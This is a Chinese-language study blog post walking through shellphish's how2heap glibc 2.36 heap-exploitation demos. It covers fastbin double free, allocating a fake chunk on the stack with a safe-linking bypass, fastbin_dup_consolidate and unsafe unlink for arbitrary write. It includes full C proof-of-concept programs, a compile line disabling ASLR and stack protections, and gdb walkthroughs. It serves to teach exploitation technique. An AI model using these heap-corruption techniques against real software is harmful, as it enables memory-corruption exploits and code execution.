how2heap全系列(持续更新)
在此记录学习how2heap的过程。感谢shellphish的 how2heap 项目。
本文基于commit id b4e4e487fd913d072b616713feb9f5e7a1e53873,glibc 2.36,相比于之前的版本代码可能会复杂一点。
需要的前置知识:
-
csapp malloc lab :对内存管理的理解有很大的帮助
-
glibc的ptmalloc的大概了解 需要知道chunk的结构,针对不同大小的chunk有哪些管理方式
/* This struct declaration is misleading (but accurate and necessary). It declares a "view" into memory allowing access to necessary fields at known offsets from a given base. See explanation below. */ struct malloc_chunk { INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */ // 如果前一个 chunk 是空闲的,该域表示前一个 chunk 的大小,如果前一个 chunk 不空闲,该域无意义。 INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */ // 当前 chunk 的大小,并且记录了当前 chunk 和前一个 chunk 的一些属性性,包括前一个 chunk 是否在 // 使用中,当前 chunk 是否是通过 mmap 获得的内存,当前 chunk 是否属于非主分配区。 struct malloc_chunk* fd; /* double links -- used only if free. */ struct malloc_chunk* bk; /* 指针 fd 和 bk 只有当该 chunk 块空闲时才存在,其作用是用于将对应的空闲 chunk 块加入到 空闲 chunk 块链表中统一管理,如果该 chunk 块被分配给应用程序使用,那么这两个指针 也就没有用(该 chunk 块已经从空闲链中拆出)了,所以也当作应用程序的使用空间,而不至于浪费。 */ /* Only used for large blocks: pointer to next larger size. */ struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */ struct malloc_chunk* bk_nextsize; /* 当当前的 chunk 存在于 large bins 中时,large bins 中的空闲 chunk 是按照大小排序的,但同一个大小的 chunk 可能有多个,增加了这两个字段可以加快 遍历空闲 chunk,并查找满足需要的空闲 chunk,fd_nextsize 指向下一个比当前 chunk 大小 大的第一个空闲 chunk,bk_nextszie 指向前一个比当前 chunk 大小小的第一个空闲 chunk。 如果该 chunk 块被分配给应用程序使用,那么这两个指针也就没有用(该 chunk 块已经从 size 链中拆出)了,所以也当作应用程序的使用空间,而不至于浪费。 */ };
注释参考了《Glibc 内存管理 Ptmalloc2 源代码分析 华庭(庄明强)》
注意chunk结构体的成员,低位在低地址,高位在高地址
-
编译选项
在学习的时候可以关闭ASLR、PIE等,这样每次运行的结果都是一样,容易复现,另外编译使用
-g
选项来使gdb可以显示源码# sysctl -w kernel.randomize_va_space=0 $ gcc xxx.c -o xx -O0 -g -z execstack -z norelro -fno-stack-protector -no-pie
first fit
This file doesn't demonstrate an attack, but shows the nature of glibc's allocator.
first fit并不是一种利用方式,而是介绍glibc的选择空闲块的策略。
glibc使用first-fit的策略选择空闲块,遍历chunk列表时,如果一个chunk是free的而且满足大小要求,glibc就会选择这个块。
代码请见 how2heap/first_fit.c at master · shellphish/how2heap (github.com)
运行结果可以验证这一点。
calc_tcache_idx
This file doesn't demonstrate an attack, but calculates the tcache idx for a given chunk size.
和上面的一样,这里给出了计算chunk位于tcache的index的方式。
The basic formula is as follows:
IDX = (CHUNKSIZE - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT
On a 64 bit system the current values are:
MINSIZE: 0x20
MALLOC_ALIGNMENT: 0x10
So we get the following equation:
IDX = (CHUNKSIZE - 0x11) / 0x10
BUT be AWARE that CHUNKSIZE is not the x in malloc(x)
It is calculated as follows:
IF x + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE(0x20) CHUNKSIZE = MINSIZE (0x20)
ELSE: CHUNKSIZE = (x + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
=> CHUNKSIZE = (x + 0x8 + 0xf) & ~0xf
fastbin_dup
Tricking malloc into returning an already-allocated heap pointer by abusing the fastbin freelist.
一个double-free的例子,连续malloc A、B、C 3个堆块,然后按顺序free A、B、A,然后调用3次malloc,结果会返回A、B、A这3个堆块。
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int main()
{
setbuf(stdout, NULL);
printf("This file demonstrates a simple double-free attack with fastbins.\n");
printf("Fill up tcache first.\n");
void *ptrs[8];
for (int i=0; i<8; i++) {
ptrs[i] = malloc(8);
}
for (int i=0; i<7; i++) {
free(ptrs[i]);
}
printf("Allocating 3 buffers.\n");
int *a = calloc(1, 8);
int *b = calloc(1, 8);
int *c = calloc(1, 8);
printf("1st calloc(1, 8): %p\n", a);
printf("2nd calloc(1, 8): %p\n", b);
printf("3rd calloc(1, 8): %p\n", c);
printf("Freeing the first one...\n");
free(a);
printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
// free(a);
printf("So, instead, we'll free %p.\n", b);
free(b);
printf("Now, we can free %p again, since it's not the head of the free list.\n", a);
free(a);
printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
a = calloc(1, 8);
b = calloc(1, 8);
c = calloc(1, 8);
printf("1st calloc(1, 8): %p\n", a);
printf("2nd calloc(1, 8): %p\n", b);
printf("3rd calloc(1, 8): %p\n", c);
assert(a == c);
开头的两个for循环用于填充tcache,tcache的限制更多,我们暂时不接触。如果不填满tcache,我们在free的时候chunk就会被放入tcache,注意接下来使用的是calloc()
而不是malloc()
,这是因为calloc()
不会去从tcache中查找堆块,这样能保证我们操作的chunk全部位于fastbin
fastbins 可以看成一个栈,使用单链表实现,通过 fastbin->fd 来遍历 fastbins。由于 free 的过程会对 free list 做检查,我们不能连续两次 free 同一个 chunk,所以这里在两次 free 之间,增加了一次对其他 chunk 的 free 过程,从而绕过检查顺利执行。然后再 malloc 三次,也就有了两个指向同一块内存区域的指针。
free的顺序需要注意,glibc有以下检查,连续free两次会被视为double-free,中间插入一次对其他chunk的free才能成功。
fastbin_dup_into_stack
This file extends on fastbin_dup.c by tricking calloc into returning a pointer to a controlled location (in this case, the stack).
这个程序扩展了上一个程序,通过fastbin_dup使malloc返回一个free chunk的地址,再通过修改其fd指针实现伪造出新的free堆块(在栈上),可以实现修改栈上的内容。 如果更进一步修改 fd 指针,则能够实现任意地址分配堆块的效果 。
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int main()
{
fprintf(stderr, "This file extends on fastbin_dup.c by tricking calloc into\n"
"returning a pointer to a controlled location (in this case, the stack).\n");
fprintf(stderr,"Fill up tcache first.\n");
void *ptrs[7];
for (int i=0; i<7; i++) {
ptrs[i] = malloc(8);
}
for (int i=0; i<7; i++) {
free(ptrs[i]);
}
unsigned long stack_var[2] __attribute__ ((aligned (0x10)));
fprintf(stderr, "The address we want calloc() to return is %p.\n", stack_var);
fprintf(stderr, "Allocating 3 buffers.\n");
int *a = calloc(1,8);
int *b = calloc(1,8);
int *c = calloc(1,8);
fprintf(stderr, "1st calloc(1,8): %p\n", a);
fprintf(stderr, "2nd calloc(1,8): %p\n", b);
fprintf(stderr, "3rd calloc(1,8): %p\n", c);
fprintf(stderr, "Freeing the first one...\n"); //First call to free will add a reference to the fastbin
free(a);
fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
fprintf(stderr, "So, instead, we'll free %p.\n", b);
free(b);
//Calling free(a) twice renders the program vulnerable to Double Free
fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
free(a);
fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
"We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
unsigned long *d = calloc(1,8);
fprintf(stderr, "1st calloc(1,8): %p\n", d);
fprintf(stderr, "2nd calloc(1,8): %p\n", calloc(1,8));
fprintf(stderr, "Now the free list has [ %p ].\n", a);
fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
"so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
"so that calloc will think there is a free chunk there and agree to\n"
"return a pointer to it.\n", a);
stack_var[1] = 0x20;
fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
fprintf(stderr, "Notice that the stored value is not a pointer but a poisoned value because of the safe linking mechanism.\n");
fprintf(stderr, "^ Reference: https://research.checkpoint.com/2020/safe-linking-eliminating-a-20-year-old-malloc-exploit-primitive/\n");
unsigned long ptr = (unsigned long)stack_var;
unsigned long addr = (unsigned long) d;
/*VULNERABILITY*/
*d = (addr >> 12) ^ ptr;
/*VULNERABILITY*/
fprintf(stderr, "3rd calloc(1,8): %p, putting the stack address on the free list\n", calloc(1,8));
void *p = calloc(1,8);
fprintf(stderr, "4th calloc(1,8): %p\n", p);
assert((unsigned long)p == (unsigned long)stack_var + 0x10);
}
这里我们在free掉a和b之后打下断点,顺便复习一下malloc chunk的结构:
/*
This struct declaration is misleading (but accurate and necessary).
It declares a "view" into memory allowing access to necessary
fields at known offsets from a given base. See explanation below.
*/
struct malloc_chunk {
INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};
对于64位系统来讲,这个结构体的每个成员都是8字节的,对于fastbin来讲,没有用到后面的两个字段。
使用heap和fastbin命令查看分配情况,可见在fastbin中有两个空闲的堆块,且大小都是0x20字节,由于fastbin 是使用单链表来维护释放的堆块的,因此即使堆块被free掉,由于只有fd的信息,无法对bk堆块的PREV_INUSE位置0,所以可以看到下图中的size都是0x21
查看堆块的内容,依次是prev_size(0), size(0x21), fd(指向前面的堆块), bk(0)。fastbins对于不同大小的堆块有不同的链表维护,因此prev_size位也不需要。
这里大家可能会有疑问,0x404390
块的fd地址不对啊?不是0x404370
而是0x404774
啊?这是由于glibc 2.32及以后的Safe Linking机制造成的,fd保存的并不是实际的前一个堆块的地址,而是(malloc_chunk->fd >> PAGE_SHIFT) ^ 目标地址
,那么通过计算(0x4043a0 >> 12) ^ 0x404370
我们可以得到0x404774
,也就是下面图片中的地址了。另外由于异或运算的特性,我们可以通过再次异或上面公式的前半部分来还原真实地址。
接下来我们再次free(a),可以得到以下:
(0x404380 >> 12 )^ 0x404794
可以得到0x404390
,也就是上面的情况了,这样我们在fastbin中0x404370
堆块便出现了 2 次。
接下来我们执行了unsigned long *d = calloc(1,8);
,然后又调用了一次calloc
,此时fastbin中的前两个堆块已被取出,剩下0x404370
此时d的值就是0x404380
,我们可以修改0x404370
堆块的fd指针了,将其指向在栈上伪造的堆块
fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
fprintf(stderr, "Notice that the stored value is not a pointer but a poisoned value because of the safe linking mechanism.\n");
fprintf(stderr, "^ Reference: https://research.checkpoint.com/2020/safe-linking-eliminating-a-20-year-old-malloc-exploit-primitive/\n");
unsigned long ptr = (unsigned long)stack_var;
unsigned long addr = (unsigned long) d;
/*VULNERABILITY*/
*d = (addr >> 12) ^ ptr;
/*VULNERABILITY*/
此时调用calloc
应当返回 &stack_var + 0x10
fastbin_dup_consolidate
和fastbin_dup类似,不同的是这里在free fastbin中的块之后申请了另外一个larger bin的堆块,导致触发了malloc_consolidate(),从而使p1不再是fastbin的第一个bin,实现了绕过double free检测。
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
void main() {
// reference: https://valsamaras.medium.com/the-toddlers-introduction-to-heap-exploitation-fastbin-dup-consolidate-part-4-2-ce6d68136aa8
puts("This is a powerful technique that bypasses the double free check in tcachebin.");
printf("Fill up the tcache list to force the fastbin usage...\n");
void *ptr[7];
for(int i = 0; i < 7; i++)
ptr[i] = malloc(0x40);
for(int i = 0; i < 7; i++)
free(ptr[i]);
void* p1 = calloc(1,0x40);
printf("Allocate another chunk of the same size p1=%p \n", p1);
printf("Freeing p1 will add this chunk to the fastbin list...\n\n");
free(p1);
void* p3 = malloc(0x400);
printf("Allocating a tcache-sized chunk (p3=%p)\n", p3);
printf("will trigger the malloc_consolidate and merge\n");
printf("the fastbin chunks into the top chunk, thus\n");
printf("p1 and p3 are now pointing to the same chunk !\n\n");
assert(p1 == p3);
printf("Triggering the double free vulnerability!\n\n");
free(p1);
void *p4 = malloc(0x400);
assert(p4 == p3);
printf("The double free added the chunk referenced by p1 \n");
printf("to the tcache thus the next similar-size malloc will\n");
printf("point to p3: p3=%p, p4=%p\n\n",p3, p4);
}
第一次free p1时可以看到其被放入了fastbin
此时查看heap,可见p1与top chunk是相邻的。
下面进行malloc操作,p1会与top chunk合并然后被返回,此时p1和p3的内容相同
再次free p1,p1会被放入tcache,当再次申请大小接近的内存时,会返回p1(也就是p3),这样就返回了一个已经分配了的堆块。
unsafe_unlink
Exploiting free on a corrupted chunk to get arbitrary write.
这个程序通过free一个伪造的堆块,实现了任意地址写。
利用条件是我们能够溢出当前堆块来修改其下一个堆块的内容。
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>
uint64_t *chunk0_ptr;
int main()
{
setbuf(stdout, NULL);
printf("Welcome to unsafe unlink 2.0!\n");
printf("Tested in Ubuntu 20.04 64bit.\n");
printf("This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n");
printf("The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\n");
int malloc_size = 0x420; //we want to be big enough not to use tcache or fastbin
int header_size = 2;
printf("The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n");
chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
uint64_t *chunk1_ptr = (uint64_t*) malloc(malloc_size); //chunk1
printf("The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
printf("The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);
printf("We create a fake chunk inside chunk0.\n");
printf("We setup the size of our fake chunk so that we can bypass the check introduced in https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d6db68e66dff25d12c3bc5641b60cbd7fb6ab44f\n");
chunk0_ptr[1] = chunk0_ptr[-1] - 0x10;
printf("We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.\n");
chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
printf("We setup the 'previous_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.\n");
printf("With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) == False\n");
chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
printf("Fake chunk fd: %p\n",(void*) chunk0_ptr[2]);
printf("Fake chunk bk: %p\n\n",(void*) chunk0_ptr[3]);
printf("We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n");
uint64_t *chunk1_hdr = chunk1_ptr - header_size;
printf("We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n");
printf("It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\n");
chunk1_hdr[0] = malloc_size;
printf("If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x430, however this is its new value: %p\n",(void*)chunk1_hdr[0]);
printf("We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.\n\n");
chunk1_hdr[1] &= ~1;
printf("Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\n");
printf("You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n\n");
free(chunk1_ptr);
printf("At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n");
char victim_string[8];
strcpy(victim_string,"Hello!~");
chunk0_ptr[3] = (uint64_t) victim_string;
printf("chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\n");
printf("Original value: %s\n",victim_string);
chunk0_ptr[0] = 0x4141414142424242LL;
printf("New Value: %s\n",victim_string);
// sanity check
assert(*(long *)victim_string == 0x4141414142424242L);
}
整个程序主要变量的内存分布如下图:
程序首先申请了两个大小为malloc_size的堆块,依次为 chunk0和chunk1。
然后我们在chunk0内部伪造一个堆块,chunk0的地址即为fake chunk的起始地址。
首先我们修改fake chunk的size为chunk0的size - 0x10字节,即29行的
chunk0_ptr[1] = chunk0_ptr[-1] - 0x10;
然后修改fake chunk的fd为&chunk0_ptr-(sizeof(uint64_t)*3)
,以绕过 P->fd->bk != P
的检查(使P->fd->bk
等于fake chunk的地址),即31行的
chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
同理,修改fake chunk的bk为&chunk0_ptr-(sizeof(uint64_t)*2)
,以绕过 P->bk->fd != P
的检查(使P->bk->fd
等于fake chunk的地址),即34行的
chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
假定我们在chunk0_ptr处能实现溢出,所以我们可以随意修改chunk1的数据。
那么我们修改chunk1的prev_size为prev_size - 0x10,这样我们在free chunk1时,会认为其前一个堆块位于fake chunk。另外我们要修改chunk1的size字段的prev_inuse位。
此时free chunk1,我们构造的fake chunk就会被unlink。unlink的宏定义如下: https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344
1343 /* Take a chunk off a bin list */
1344 #define unlink(AV, P, BK, FD) { \
1345 FD = P->fd; \
1346 BK = P->bk; \
1347 if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \
1348 malloc_printerr (check_action, "corrupted double-linked list", P, AV); \
1349 else { \
1350 FD->bk = BK; \
1351 BK->fd = FD; \
1352 if (!in_smallbin_range (P->size) \
1353 && __builtin_expect (P->fd_nextsize != NULL, 0)) { \
1354 if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0) \
1355 || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0)) \
1356 malloc_printerr (check_action, \
1357 "corrupted double-linked list (not small)", \
1358 P, AV); \
1359 if (FD->fd_nextsize == NULL) { \
1360 if (P->fd_nextsize == P) \
1361 FD->fd_nextsize = FD->bk_nextsize = FD; \
1362 else { \
1363 FD->fd_nextsize = P->fd_nextsize; \
1364 FD->bk_nextsize = P->bk_nextsize; \
1365 P->fd_nextsize->bk_nextsize = FD; \
1366 P->bk_nextsize->fd_nextsize = FD; \
1367 } \
1368 } else { \
1369 P->fd_nextsize->bk_nextsize = P->bk_nextsize; \
1370 P->bk_nextsize->fd_nextsize = P->fd_nextsize; \
1371 } \
1372 } \
1373 } \
1374 }
由于我们的大小在smallbin的范围内,1352行以后的检查不会进行,1347行的检查已经被绕过。
等价代码如下:
FD = P->fd; // FD = &chunk0_ptr-(sizeof(uint64_t)*3)
BK = P->bk; // BK = &chunk0_ptr-(sizeof(uint64_t)*2)
FD->bk = BK // FD->bk(&chunk0_ptr-(sizeof(uint64_t)*3)+(sizeof(uint64_t)*3)) = &chunk0_ptr-(sizeof(uint64_t)*2)
BK->fd = FD // BK->fd(&chunk0_ptr-(sizeof(uint64_t)*2+(sizeof(uint64_t)*2) = &chunk0_ptr-(sizeof(uint64_t)*3)
这里是关键的地方,FD->bk
和BK->fd
其实都是chunk0_ptr的地址(BSS段),最后一行的作用是将chunk0_ptr变量的内容改成chunk0_ptr的地址减去0x18。
这样&chunk0_ptr[3]是chunk0_ptr的地址,这时我们可以用下面的语句修改变量chunk0_ptr指向的位置:
chunk0_ptr[3] = (uint64_t) victim_string;
然后我们就可以实现任意地址写:
chunk0_ptr[0] = 0x4141414142424242LL;